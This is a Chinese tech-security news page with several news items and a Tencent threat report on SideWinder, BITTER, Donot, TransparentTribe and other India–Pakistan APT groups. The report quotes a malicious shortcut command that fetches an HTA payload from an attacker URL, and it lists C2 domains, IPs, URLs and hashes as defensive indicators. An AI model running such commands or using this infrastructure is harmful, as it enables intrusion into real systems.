分类: 国际动态

谷歌再次面临欧盟隐私裁决 或将在全球范围删除链接

北京时间9月23日下午消息,据彭博社报道,五年前,一项“被遗忘权”裁决强制谷歌应要求删除个人信息。五年之后,谷歌将再次面临欧盟最高法院即将作出的另一项重大隐私权决定。 欧盟法院将在周二对这家美国巨头与法国数据保护监管机构CNIL的后续纠纷作出裁决,裁定该“被遗忘权”是否应该在全球范围内适用,以及界定隐私与言论自由之间的边界。 法国当局要求谷歌根据要求,在全球范围内删除该搜索引擎平台上的链接,如果这些链接指向包含过时或虚假信息并有可能不公平地损害个人声誉的网站。法官或许还将阐明哪些链接可以在线保留,以维护公共利益。对于法国当局的要求,谷歌正尽全力反抗。 从谷歌的角度而言,互联网的命运危在旦夕。2014年的裁决已经迫使谷歌在欧洲呈现与世界其他地区不同的搜索结果。法国的CNIL则表示,谷歌应该在全球范围内清楚这些搜索结果。而谷歌在此案中的支持者(包括新闻自由团体)提醒道,这样的要求恐怕会给专制政权行便利,允许他们通过决定哪些内容可以公开而达到审查整个互联网的目的。 伦敦林克莱特斯律师事务所的律师理查德·坎伯利(Richard Cumbley)认为:“这个案子突显了国家法律与互联网之间的持续冲突。”全球范围内的遗忘权若裁决通过,“将与美国的言论自由概念产生严重冲突,而其他国家可能也会试图并在全球范围内控制搜索结果,减少谷歌搜索引擎恐带来的潜在麻烦。” 欧盟法院的裁决很难预测。法院的最初决定否决了谷歌提出的辩护,即该搜索引擎只是一个提供信息的中立渠道,这样的结果令谷歌颇感震惊。裁决实际上也将判断权留给了谷歌,让谷歌来决定某个被要求删除的链接是否包含某些“不再相关的”内容。 自2014之后,谷歌已经被迫评估了近85万条单独的链接删除请求,涉及的网站多达330万个。谷歌的工作人员实则承担起半监管的角色,以在哪些信息应该公开和哪些应该删除之间努力取得平衡。 现在,法院必须阐明谷歌应删除链接的范围。谷歌是否应该在单个国家或整个欧洲删除链接?是否必须从本地网站如法国的谷歌(google.fr)搜索结果中删除链接,还是必须从全球域名(google.com)的搜索结果中删除链接?——以及,这些内容若可以从法国、欧洲或其他地方访问,谷歌又该怎么做? 自2016年以来,公司已经采用所谓的“地理封锁”功能来过滤呈现给欧洲用户的所有谷歌网站上的搜索结果,这样欧洲的用户就不会看到他们国家某个人希望限制的信息。 欧盟法院还必须考虑,谷歌是否可以拒绝删除某些符合公共利益的信息。欧盟法院将就删除与公职人员的个人关系有关的链接和一篇提及山达基教会公关经理姓名的文章链接而产生的争议,向法国法院提供建议。 伦敦和巴黎的法官对抑制有损个人声誉的信息的努力表示支持。去年,伦敦一法院通知谷歌删除关于商人刑事定罪的新闻报道,以符合制造帮助人们放下过去犯罪行为的英国法律。巴黎法官也曾要求谷歌减少有关某一位前首席财务官因内幕交易行为而被罚款的报道的曝光度。 谷歌和法国隐私监管机构CNIL均尚未立即回复评论请求。 谷歌作为欧洲的一个领先搜索引擎,其重要性已经引起欧盟重视,并宣称谷歌主导了欧洲市场。同时,谷歌也对欧盟法院提出的数十亿欧元的反垄断罚款提出抗辩。   (稿源:,稿件以及封面源自网络。)

数据库泄露了厄瓜多尔大多数公民的数据 其中包括 670 万儿童

ZDNet了解到,由于数据库配置错误,厄瓜多尔大部分人口(包括儿童)的个人记录已在网上曝光。两周前,vpnMentor安全研究人员Noam Rotem和Ran Locar发现了这个数据库泄露。这应该是厄瓜多尔历史上最大的数据泄露事件之一,厄瓜多尔是一个拥有1660万公民的南美小国。 这次泄露的数据库总共包含大约2080万个用户记录,这个数据库记录的数量大于该国家的总人口数,其中原因可能来自重复记录或较旧的条目,包含死者的数据。这项数据分布在不同的索引中。这些索引包含不同的信息,其中存储了用户详细信息,如姓名,家庭成员,民事登记数据,财务和工作信息,以及汽车所有权数据。 根据这些索引的名称,整个数据库可以根据数据的假定来源分为两大类。有一些数据似乎是从政府来源收集的,还有一些数据似乎是从私人数据库收集的。这些数据包含公民全名、出生日期、出生地、家庭住址、婚姻状况、塞杜拉细节(国家身份证号码)、工作/工作信息、电话号码和教育程度等条目。 然而,事情并没有就此停止。安全研究人员发现整个数据库当中也包含大量儿童信息,有些儿童甚至是今年春季才出生。具体来说,其中包含大约677万个18岁以下儿童条目。这些条目包含姓名、出生地、家庭住址和性别等信息。   (稿源:cnBeta,封面源自网络。)

微软总裁在新书中透露:特朗普顾问希望微软帮助美国政府监视其他国家

据外媒MSPoweruser报道,微软总裁兼首席法律顾问布拉德·史密斯(Brad Smit)最近发行了他的新书《工具和武器:数字时代的希望和危机》(Tools & Weapons: The Promise and the Peril of the Digital Age),而这本书打开了“潘多拉魔盒”。 本周早些时候,外媒曾报道称布拉德·史密斯认为美国政府对待华为的方式一点也不美国(un-American)。史密斯在其新书中还透露,泰勒·斯威夫特的律师曾在2016年威胁要起诉微软。因为微软的聊天机器人Tay的名字和Taylor很相似。 现在,Geekwire引用了他的书中的一段话,其中揭示了特朗普政府如何希望微软帮助其监视其他国家。史密斯在书中写道:“作为一家美国公司,你为什么不同意帮助美国政府监视其他国家的人?”他指出,微软向美国政府明确表示他们不愿意接受有关这个问题的任何讨论。 我指出,特朗普酒店刚刚在中东和宾夕法尼亚大街的街道上开设了新房产。“这些酒店是否会对那些留在那里的其他国家的人进行监视活动?这对家族企业来说似乎不太好。 – 当特朗普顾问询问为什么微软不帮助他们监视其他国家的人时,布拉德·史密斯如是说 布拉德·史密斯在新书中还介绍了微软等公司面临的类似复杂的法律和道德挑战。他指出,特朗普并不是第一个对微软提出异议的总统。该书的内容还包括微软与奥巴马政府就隐私与面部识别政策等问题存在分歧的情况。 政府如何管理比自己更大的技术?这可能是技术监管未来面临的最大难题。但是一旦你提出这个问题,答案的一部分就变得清晰了:政府需要共同努力。 – 布拉德·史密斯   (稿源:cnBeta,封面源自网络。)

在维基百科遭遇 DDoS 攻击后 维基媒体宣布获 250 万美元资金支持

据外媒报道,上周五,维基百科在遭遇恶意DDOS攻击后在数个国家下线。维基媒体基金会之后证实了这一事件并开始着手调查。很快,维基百科在这些国家恢复正常。不过几日后该非营利组织仍未就这起网络攻击事件是否已经得到彻底解决做出证实。 现在,维基媒体宣布克雷格·纽马克慈善基金会(Craig Newmark Philanthropies)获得了250万美元的资金支持,这在时间点上是一个相当有趣的举动。据悉,这笔来自Craigslist创始人基金会的捐款则是为了帮助维基媒体保护其项目和志愿者免受网络威胁。 维基媒体基金会安全主管John Bennett就这笔投资的必要性发表了以下言论:“维基百科拥有数亿用户的十大网站的持续成功使其成为了破坏、黑客攻击和其他网络安全威胁的目标,这些威胁损害到了自由知识运动和社区。这就是为什么我们在问题出现之前就积极地与之斗争。这笔投资将使我们能进一步扩大我们的安全计划进而识别当前和未来的威胁、制定有效的对策,并改善我们的整体安全控制。” 这项慈善投资将有助于提供对该组织服务包括维基百科的安全访问。另外,该非营利组织还指出,这笔捐款可以更好地缓解上周发生的袭击事件。   (稿源:cnBeta,封面源自网络。)

印巴战争阴影下的网络战——近期印巴 APT 组织攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文: https://mp.weixin.qq.com/s/pJ-rnzB7VMZ0feM2X0ZrHA   一、背景 印度和巴基斯坦同属于南亚地区的两个国家,但是由于一些历史原因,两国关系一直不大和睦,冲突不断。从2019年初开始,双方关系突然紧张,冲突升级。今年2月,印度空军飞越克什米尔巴方实控线,被巴军方击落并俘获一名印度空军飞行员,同时这也是印度首次袭击巴基斯坦境内。两国在克什米尔印军队集结并且频繁交火,印方甚至水淹巴基斯坦,打开阿尔奇大坝,造成巴基斯坦面临洪水的危机,同时印方几日前公开宣称,可能会先对巴基斯坦使用核武措施。 随着双方的军事冲突愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事件后,腾讯安全御见威胁情报中心曾捕获并发布了一例以此次冲突事件为诱饵的APT攻击样本,分析后确认了该样本源于巴基斯坦的APT攻击组织TransparentTribe(见参考文章1),此外印度针对巴基斯坦的攻击活动也一直在持续中,腾讯安全御见威胁情报中心也曾多次发布相关的分析报告(见参考文章2、3) 网络战被认为是地缘政治的延伸,甚至是战争和冲突的一部分。APT攻击做为网络战中的重要攻击活动,其活跃趋势跟地缘政治等全球热点问题密切相关,全球APT攻击高发区域也是全球地缘政治冲突的敏感地域。纵观2019年活跃的网络攻击活动,无一不是政治局势复杂和敏感的地域,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国家间政治博弈甚至是现代战争的重要组成部分。 回到印巴冲突中,腾讯安全御见情报威胁中心捕获到大量关于印巴网络攻击的恶意样本。经过深度分析和跟踪溯源,我们归类出较为活跃的几个APT组织,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。同时在分析溯源的过程中,我们还发现APT组织之间相互伪装,试图来混淆安全人员分析,躲避追踪。本文为对该些活动和组织的一些总结,可能会存在一定的疏漏,还请业内同行再作补充。 二、疑似来自印度的攻击 印方在对巴基斯坦的网络攻击活动中,一直处于强势和主导的地步,还涉及到跟印度相关的APT攻击组织也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。 1、SideWinder(响尾蛇) 组织概况 SideWinder(响尾蛇)是腾讯安全御见情报威胁中心最早在2018年披露的APT攻击组织,得名由来为该组织的背景跟卡巴斯基在2018年第一季度报告中提到的SideWinder组织非常的相似,虽然卡巴斯基并未发布任何该组织的技术细节和报告。即便如此,我们还是继续沿用卡巴斯基的命名,命名该组织为”响尾蛇”。 该组织的最早的攻击活动可以追溯到 2012 年。在2019年2月,腾讯安全御见情报威胁中心再次详细的披露过该组织在2018年下半年的一些攻击活动。此外,国内有多个安全公司也同时披露过该组织的其他的一些攻击活动。 攻击目标 主要为巴基斯坦政府部门(如内阁部门)、巴基斯坦军方、军事目标等 技术手段 SideWinder(响尾蛇)主要采用鱼叉攻击的方式,投递带有漏洞的office文档或者包含恶意lnk的压缩包文件,受害者打开office文档或者恶意lnk文件后会下载执行hta文件,通过执行hta脚本进一步下载后门RAT。 如某次攻击的钓鱼邮件:   如某次攻击的诱饵: 压缩包解压后为一个恶意的lnk文件: 执行命令: %windir%\system32\mshtb.exe http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d 执行的脚本后,除了收集本地杀软信息外,还会解密诱饵pdf文件内容并且打开,随着继续下载下一阶段的hta脚本。 打开的诱饵pdf内容为: hta脚本为最终会使用一个白加黑技术,来执行最终的后门文件SystemApp.dll,该后门用来进行信息的收集,包括系统信息、文件信息等。 白加黑文件: 后门内容: 此外,其他的攻击中,该组织还会使用VB的RAT,如: 组织小节 2、BITTER(蔓灵花) & Patchwork(白象)& White Company & Confucius(孔子) 组织概况 之所以把这几个组织放在一起,是因为我们相信,该四个组织之间都存在一定的关联,甚至为同一组织或同一组织分化出来的不同的小组。如BITTER(蔓灵花)跟Patchwork(白象)和还有Confucius(孔子),我们不止一次的在我们的分析报告中指出存在包括武器库、基础设施等的共用的证据,如《蔓灵花(BITTER)APT组织针对中国境内政府、军工、核能等敏感机构的最新攻击活动报告》等。 其中,蔓灵花最早在2016由美国安全公司Forcepoint进行了披露,并且命名为“BITTER”,得名由来为早期的特马的数据包中都包含字符“BITTER”做为标识,因此得名。同年国内友商360也跟进发布了分析报告,命名为“蔓灵花”。当然该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。 白象组织,也叫摩诃草、Patchwork、HangOver,该最早可以追溯到2009年11月,至今还非常活跃。同样该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。 White Company为2018年由cylance公司披露的APT组织,虽然该公司的报告中未明确指出该组织的背景,但是从我们的分析发现,该组织同样来自印度,并且我们也进一步发现,该组织的武器库和白象相重叠。 Confucius(孔子)为Palo Alto Networks Unit 42在2016年发现针对南亚特定人群的威胁组织。该组织在恶意代码和基础设施上与白象和蔓灵花均存在重叠,但目标稍有不同。   攻击目标 技术手段 这几个组织都习惯使用鱼叉攻击的方式,投递含有漏洞或宏的office文档、带有漏洞的InPage文件、自解压文件等。 如蔓灵花的诱饵文档: 如白象的诱饵: 如Confucius(孔子)的诱饵: 而执行诱饵文档后,最终的武器库也略有不同。如蔓灵花: 蔓灵花第一阶段木马一般都为一个downloader,除了下载第二阶段的相关木马外,还会收集用户的相关信息,如上报信息: “?a=administ-b24c70&b=ADMINIST-B24C70&c=Microsoft%20Windows%20XP&d=AdministratorAdministrator3fb4c154-b52a-4667-8a49-4fbe422781b5365536040965860&e=” 上报内容包括主机名、计算机名、操作系统名、用户名等。 而第二阶段为下发相应的插件,插件内容包括添加开机启动、键盘记录、最终的远控木马等。 此外,蔓灵花还存在一些使用习惯,如文件目录习惯使用new_downloader_xxx: 而下载地址习惯使用healthne: 如白象: 今年最常使用的特马为名为badnews的特马,使用github和feed43等公用平台用来分发C&C: 特马功能 组织关系 我们之前的文章已经多次指出了BITTER、白象、Confucius之间的关系,本文着重描述下白象跟White Company之间的关系。 如我们从确定白象的某个样本中(97187e5e8b9a752b5f6377df3bea17b5),发现了样本中包含了提权漏洞CVE-2016-7255的模块: 把该模块dump下来后,根据模块的特征我们进行搜索,发现了某篇文章中: 跟文章中的代码完全相似(https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan): 而我们对该漏洞的所有公开利用的代码经过搜寻,以及对该模块的特征进行搜索,均未在其他的攻击活动中发现跟该模块匹配的利用代码和代码结构,因此我们判断该特权利用模块为该组织特有,而该文章曝光的活动的组织跟白象为同一个或者能通用武器库的攻击小组。 而继续对该文章中披露的组织进行研究,我们发现该攻击组织就位cylance曝光的White Company: 组织小节 3、Donot Team 组织概况 Donot Team是2018年被曝光的APT攻击组织,最早在2018年3月由NetScout公司的ASERT团队进行了披露,随后国内的厂商奇安信也进行了披露。 该组织的得来自某攻击文件中的pdb中含有donot目录(如样本59733668b3ad8056ffd4c5c9db876cbc,pdb为:C:\Users\donot\Documents\Visual Studio 2010\Projects\downloader\Debug\downloader.pdb),因此取名为Donot Team,国内的安全厂商奇安信通过音译命名为肚脑虫,我们继续沿用该命名。该组织主要针对巴基斯坦进行攻击活动。 攻击目标 巴基斯坦政府部门、巴基斯坦军方、金融机构、外贸人士等 技术手段 Donot Team通常会投递带有恶意宏的office文档文件,文档名和文档内容都具有很强的针对性。 如使用巴基斯坦空军的诱饵: 如伪装巴基斯坦国家银行Excel计算器: 当受害者打开office恶意样本后,会提示执行宏代码,点击执行后会释放包含脚本和后门程序的压缩包,然后解压执行脚本,脚本最终会启动后门木马。 相关宏代码: 释放的压缩包: 执行脚本代码: 最终执行的恶意文件,会根据返回的Content-Typel来进行下一步行为: 1)当返回的为application时则会将返回的包解码exe后存储到  %userprofile%\\DriveData\\Files\\目录下。 2)当返回的是cmdline时,则会执行%userprofile%\\DriveData\\Files\\wuaupdt.exe 3)当返回的是batcmd的时,则会执行%userprofile%\\DriveData\\Files\\test.bat 4)除了windows上的攻击外,Donot Team还拥有移动端的攻击能力。如使用安卓特马StealJob的攻击流程(来源奇安信博客分析,见参考文章4): 相关功能 组织小节   三、疑似来自巴基斯坦的攻击 巴方在对印度的网络攻击活动中,一直处于弱势和挨打的地位,目前发现的相关的APT攻击组织也相对较少,较有代表性的是TransparentTribe。 组织概况 TransparentTribe APT组织,又称ProjectM、C-Major,该组织的活动最早可以追溯到2012年。该组织的相关活动在2016年3月被proofpoint披露,趋势科技随后也跟进进行了相关活动的披露。 腾讯安全御见威胁情报中心曾在上半年曝光过该组织的相关攻击活动《TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告》。 攻击目标 印度政府、印度军方、军事研究机构等。 技术手段 TransparentTribe通常投递带有恶意宏的office文档,诱饵文档内容多与政府、军事相关,当受害者打开恶意文档后,会提示执行宏代码,一般点击执行后诱饵内容才会显示出来。 如跟印度陆战研究中心(CLAWS)相关诱饵: 如跟印度国防学院(NDC)相关诱饵: 宏代码执行后会释放一个压缩包文件,并解压出包含的木马后门执行: 在后门使用上,该组织依旧使用CrimsonRAT、.net loader、.net droper、PeppyRAT 相关特马: 而经过腾讯安全御见威胁情报中心的数据溯源,该组织疑似跟巴基斯坦另外一个组织Gorgon Group有一定的关联: 组织小节   四、存在的假旗(false flag) 在印巴双方网络战持续不断时,其中Donot Team和TransparentTribe 两个APT组织引起我们格外的注意,经过详细分析后发现两个疑似敌对组织不断的互相模仿,影响安全研究人员对其追踪溯源。 例如Donot样本宏代码和TransparentTribe样本宏代码高度相似,可以看到Donot宏代码注释的地方,注释的这段代码是要执行的exe路径,但是Donot实际上执行的是bat脚本,我们再对比下TransparentTribe就能发现,TransparentTribe才是执行exe的。并且Donot样本中这段被注释的代码与TransparentTribe样本中的一致(左边Donot,右边TransparentTribe): 并且部分代码函数都是一模一样的,函数命名和常量值(左边Donot,右边TransparentTribe): 甚至在某些样本中两个APT组织释放的木马名称都完全一样(左边Donot,右边TransparentTribe): 我们相信,印巴双方的组织还会继续模仿下去,这势必给安全研究人员在定性上产生更多的干扰。   五、总结 从上文可以看到,由于印巴两国的长期以来的紧张关系,网络攻击一直都没停止过。即便两国的活动多次被安全公司所曝光,但是各自国家的组织完全没停止攻击的意思,相反是越来越猛烈。2019年对印巴两国来说,是个不平静的一年,双边的局势冲突不断,网络战也一浪高过一浪。我们相信,这种网络抗衡会持续进行下去。 没有网络安全就没有国家安全,随着政治局势的恶化,网络战势必会愈演愈烈。虽然我们处于和平年代,但是我们的相关部门和单位切记要提高警惕,保障重点部门和单位的网络安全。   六、安全建议 针对重要政府机构、重点企业、科研单位的APT攻击,已经成为网络战背景下的日常偷袭活动,攻击者平时以刺探情报、入侵渗透为主,一旦冲突加剧,随时可能提升攻击破坏的烈度。腾讯安全专家建议相关敏感单位加强网络信息系统安全管理,加强对员工的安全意识教育,防患于未然。可参考以下几点建议: 1、建议不要打开不明来源的邮件附件;除非非常清楚文档来源可靠,否则建议不要启用Office执行宏代码; 2、及时安装系统补丁和重要软件的补丁; 3、使用杀毒软件防御可能的病毒木马攻击,建议全网安装御点终端安全管理系统 (https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 4、使用腾讯御界高级威胁检测系统,及时发现APT攻击的蛛丝马迹。腾讯御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。更多信息可参考官方网站(https://s.tencent.com/product/yujie/index.html)   IOCs MD5: 050dd090b5af80fb73b2d6e6c8a3adc9 d78d30c43bdd0251fce773376a2eca24 4d59b084df25e9c6cba6343b753077b3 86938e9ed38f59630ee2318ad5a91f30 7b6fb1c1cf09cb371f8a22ac3c19da10 f64125c34cb209c71ca137513bf9714b 35a9d47a8b6d0fab0a8bfdf1b1381486 9eb7cbd46aa2aa624ae13acb64394b1c 6d3e9283b52086a406358ca914e23837 afffa7af5e795f911434b6e7016fc6e5 3c06cbcb6bb57b688ca30659c6c031a5 e9c8d0d4c74d53566b446e1242947e15 23b4dbbe5f3a44798312c1fd66117221 42b713a261d61c5c00b7704ae1f4b912 561adc55d8a9bf9d6966f7dd234d1e20 a66aa5eb35c67f685cc425c1d04d0f5f cf665bbf0c208e5eb29ad99f9154bf3e a6270064f1630cdf5bcda858762db516 7f99acb32db8b99fbe9347d3e69e9063 0a3a423d5cd7628efcc12cdbce378edf 0108a194e11a2d871f5571108087c05d f7d2b9541d9035d31c637d39d88d18a7 08a8db28207fa13ebb25cf0064d12f17 9c6999f6b2415761fa85d6391dfb4628 f5a5f7af4e46e89e9f2a84cc293f1250 0fa9b24535f55ec64be0f02a75d637b3 43a2dad49d410b143b8a26772d6e71dd 159890b8b9e66cc8138d332d860ddd96 4d401db3dc6172e7b16bcbe7d87fc526 02ba9703d1f250b411ea4c868d17fd2e db5193d53f7bb509928304ad8326f359 8d8822326f53982b141dc0e7f6cf948a 91e5c5afcf42f8912d5ae3b7dafcda22 96e351e7faf7197677e58a1f6390b0f0 babca0f4ccca5c46f6145580a92284f9 427d28ebedbe8b2b730de1d34435dcb8 URL: https://trans-pre.net/ini/sJDts1oInx8fbn0ffcxa3R6L82v5k8Ali9eiPb78/11991/5183/be30afa8 http://www.download.fbr.gov.pk.cdn-ps.net/plugins/11991/5183/true/true/ http://www.download.fbr.gov.pk.cdn-ps.net/cgi/8ee4d36866/11991/5183/aca094d0/file.hta http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d http://www.cdn-ps.net/plugins/-1/9373/true/true/ http://www.cdn-ps.net/cgi/8ee4d36866/-1/9373/34f1d81f/file.hta https://transpre.net/ini/NrveX8Yi7Mgr06nqM86Wba9uW8LdbbJ2HAaB9zWG/-1/9373/8a7b946c C&C: 185.99.133.27 data-backup.online unique.fontsupdate.com servicejobs.life 212.32.226.244 111.115.60.18 ezeescan.com 95.168.176.141   参考资料 1)TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告https://s.tencent.com/research/report/669.html 2)响尾蛇(SideWinder)APT组织针对南亚的攻击活动披露https://s.tencent.com/research/report/659.html 3)疑似白象组织针对巴基斯坦、孟加拉国等南亚国家的最新攻击活动报告https://s.tencent.com/research/report/711.html 4)肚脑虫团伙利用新特种安卓木马StealJob的攻击分析https://ti.qianxin.com/blog/articles/stealjob-new-android-malware-used-by-donot-apt-group/ 5)https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf 6)针对巴基斯坦的RAT https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan

为调查非法武器 美政府令苹果谷歌提交万名用户数据

北京时间9月10日上午消息,据福布斯杂志网站报道,最近,美国政府希望苹果和谷歌提交使用枪支相关应用的用户数据,包括姓名、电话号码和其他身份识别数据。涉及的用户数量至少有1万名。 这样的举措前所未有:美国调查人员从未在任何一个案件中,要求苹果和谷歌提价及单个应用的用户个人信息;也从未公开任何一项命令,允许联邦政府要求硅谷巨头一次提交近万人的个人信息。 根据司法部(DOJ)在9月5日提交的法院命令申请,调查人员希望获取有关Obsidian 4应用上的用户信息。Obsidian 4是一个用来控制American Technologies Network Corp(ATN)制造的步枪瞄准器的工具。该应用允许枪支持有人从Android或iPhone设备上获取直播、录制视频并校准枪支瞄准器。Google Play上的Obsidian 4的信息页显示,该应用下载量已超过1万次。苹果未提供下载数据,因此我们尚不清楚有多少iPhone用户受此次政府新措施的影响。 隐私活动人士提醒称,若法院批准该请求,且苹果和谷歌也决定予以配合的话,数千名与犯罪无关的用户的个人数据将被调查。隐私国家的国家监督计划负责人埃丁·奥曼诺维奇(Edin Omanovic)表示,这将开创一个危险的先例,并擭取“大量无辜用户的个人数据”。 “这样的命令应该仅针对嫌疑犯且是具体化的——但这个命令两项都不符合,”奥曼诺维奇说。 截至文章发布时,苹果与谷歌均尚未回复评论请求。瞄准器制造商ATN也未予以回复。美国司法部也未回复评论请求。 美国移民与海关执法局(ICE)希望获得这些数据,来广泛调查可能的违反武器出口规定的行为。ICE目前正在调查ATN瞄准器的非法出口,但公司本身未接受调查。因此,调查人员希望找到一种快速的方法,确定应用使用的位置,因为这个信息很有可能暗示硬件被发往哪个位置。ICE调查的对象目前仍是个谜团,因为至今不管是ATN公司还是武器工具零售商都未曾被公诉。 若法院签发该命令,苹果和谷歌将需要提交从2017年8月1日起到目前为止下载过该瞄准器应用的用户姓名,电话号码和IP地址等等。 这一要求牵涉广泛,不仅是可能非法获得枪支的海外用户,包括美国境内使用该应用的用户也会被卷入调查。 尽管这项命令在美国前所未有,但非美国政府之前已尝试过类似的策略。福布斯此前报道过,曾有一政府要求苹果提交一个相关应用的5800万名用户的数据,以跟踪一个恐怖分子的基层组织。但苹果拒绝了提交数据的请求。   (稿源:,稿件以及封面源自网络。)

Web 工具 MANRS Observatory 发布:可监测网络路由安全

近期由非营利组织国际互联网协会(Internet Society)支持倡导的路由安全相互协议规范(MANRS)活动,致力于让互联网服务提供商注意他们的举止,特别是涉及如何使用边界网关协议(BGP),偶尔滥用通信方法驱动互联网流量的大部分路由。 在8月13日,MANRS倡议活动启动了MANRS Observatory,这是一项全新的Web工具,可以深入了解网络如何符合路由安全标准。该观察站为大多数用户提供了看不到的互联网部分透明度。 路由安全对网路的未来和稳定至关重要,但它却一直遭受威胁2018年有超过12000起路由中断或攻击事件,造成资料遭窃,损失收入,损害声誉等;去年因奈及利亚ISP业者引起的路由泄露,使得谷歌的讯务被误导至中国,导致世界许多地方网路中断,另外,今年6月,一次大规模的路由泄露让网路断线好几小时。 MANRS Observatory藉由追踪路由事件的数量,以及监测MANRS行动指标,来显示该网路遵守MANRS的合规程度。该工具将来自多个可信任第三方的数据,并使用对使用者友好的界面呈现。 使用MANRS Observatory工具的好处: 成效衡量指标:参与者可轻松地监控他们遵守MANRS要求的合规程度,并对其安全控制进行必要的调整。 业务发展:参与者可比较他们与同行间的表现,并利用MANRS瞭望台来判断潜在合作伙伴的安全措施是否达到标准。 政府:政策制定者更可了解路由安全和灵活性的情况,并透过呼吁采用MANRS最佳实践做改善。 社会责任:实施MANRS是自愿性的,步骤简单,且不会造成破坏瞭望台可协助参与者确保他们和同行的网路安全,也有助于提高整体网路的路由安全。   (稿源:cnBeta,封面源自网络。)

漏洞赏金平台 HackerOne 完成 3640 万美元 D 轮融资

据外媒VentureBeat报道,2018年,全球网络安全市场固定在1520亿美元,预计几年内将增长到2500亿美元。无论公司投入多少资金以确保其产品无故障,其系统中可能存在某些漏洞,使其容易被入侵。在此背景下,漏洞赏金平台HackerOne周日宣布,其已经在Valor Equity Partners领投的D轮融资中募集了3640万美元,另外包括Benchmark,New Enterprise Associates,Dragoneer Investment Group和EQT Ventures等跟投。 总部位于旧金山的HackerOne成立于2012年,是一个将公司与安全研究人员或“白帽黑客”联系起来的平台,后者将可以查找和报告软件应用程序中的安全漏洞而获得现金奖励。 除了为发现和报告漏洞的人提供奖励之外,HackerOne向公司收取20%的佣金。该公司表示,针对白帽黑客攻击关键漏洞的平均奖金现在为3384美元,同比增长48%,其中六名HackerOne社区成员的总收入超过100万美元。 早在6月份,在网络攻击危及数据并禁用关键计算机系统后,佛罗里达州的两个城市向黑客集体支付了超过100万美元的比特币赎金。这有助于说明针对不良行为者的吸引力应用程序和数据库漏洞 – 它不仅仅是窃取数据,因为勒索软件攻击也可以证明是非常有利可图的。此外,越来越多的软件公司成为网络犯罪分子的目标。这就是为什么投资者热衷于支持HackerOne及其旧金山竞争对手BugcroWD等漏洞赏金平台的原因,该公司去年筹集了2600万美元的资金。 “HackerOne正在引领新一波网络安全公司应对快速增长和更复杂的攻击带来的独特挑战,”Valor Equity Partners的David Obrand说道,他现在加入了HackerOne的董事会。“以黑客为动力的安全性已经存在,而且凭借其巨大的客户和黑客社区,HackerOne正在主导市场。” HackerOne声称其拥有一些著名的客户,包括阿里巴巴,Airbnb,美国国防部,Dropbox,高盛,英特尔,星巴克,Spotify,任天堂,PayPal,丰田,Twitter等等。根据该公司的说法,白帽黑客每天都会通过HackerOne与公司联系,并且在超过四分之三的新漏洞奖励计划中,一天之内就会报告一个有效的漏洞。据HackerOne称,其中四分之一被认为具有“高”或“严重”漏洞。 HackerOne首席执行官Marten Mickos补充说:“HackerOne的成立是为了让世界能够建立一个更安全的互联网。我们的业务增长速度超过了市场平均水平,随着一些世界领先组织(金融服务、零售、酒店等)越来越多的采用,现在是时候让全球所有组织都可以使用HackerOne社区和平台了这依赖于软件。” HackerOne之前筹集了大约7400万美元,其中包括2017年完成的4000万美元C轮融资。该公司计划加快全球扩张并扩大其“企业和数据驱动产品”。“这一轮新的资金使我们能够为每个人带来黑客驱动的安全性,”Mickos补充道。   (稿源:cnBeta,封面源自网络。)

谷歌 YouTube 因非法收集儿童个人信息被罚 1.7 亿美元

讯 北京时间9月5日凌晨消息,美国联邦贸易委员会(FTC)周三称,Alphabet旗下谷歌公司及其YouTube视频服务将支付1.7亿美元和解金,以了结有关YouTube收集儿童个人信息并因此触犯了联邦法律的指控。 YouTube被控在未经父母同意的情况下使用“cookies”追踪儿童频道的观众,并借此向这些观众投放了价值数百万美元的靶向广告。 谷歌与联邦贸易委员会和纽约总检察官办公室达成了这项和解,其中后者将拿到3400万美元,这是自1998年禁止收集13岁以下儿童信息的法律生效以来最大的一笔和解金。这项法律在2013年进行了修订,将用于跟踪用户的互联网收视习惯的“cookies”覆盖在内。 与公司营收相比,这一和解金的数字则是很小的。Alphabet约85%营收来自出售广告位和广告技术,该公司7月公布财报称其第二季度总营收达389亿美元。 YouTube周三发布声明称,在4个月后,无论是谁观看儿童内容,YouTube都将把从中收集到的所有数据都当作来自儿童的数据来进行处理。YouTube在官方博客上表示:“这就意味着,我们将会限制面向儿童制作的视频的数据收集及其使用,将其限制在支持服务运营所需范围之内。” 除了罚款之外,拟议的和解方案还要求谷歌开发一套识别儿童内容的系统,并通知频道所有者他们有义务先征得家长的同意,随后才能收集儿童信息。 联邦贸易委员会下属消费者保护局局长安德鲁·史密斯(Andrew Smith)表示,1.7亿美元的和解金是以谷歌通过收集儿童个人信息所得收入,再乘以一个倍数而得出的。他还补充称:“很巧的是,1.7亿美元大约是消费者保护局一年的预算。” 史密斯称,一旦和解协议生效,联邦贸易委员会计划“对YouTube平台进行一次‘扫荡’,以确定是否仍然存在以儿童为导向的内容”并收集个人信息。 政府在此前提交的诉状中表示,在向美泰(Mattel)和孩之宝(Hasbro)等公司推销自己时,YouTube称其在儿童中极受欢迎。 纽约州总检察官利蒂西亚·詹姆斯(Letitia 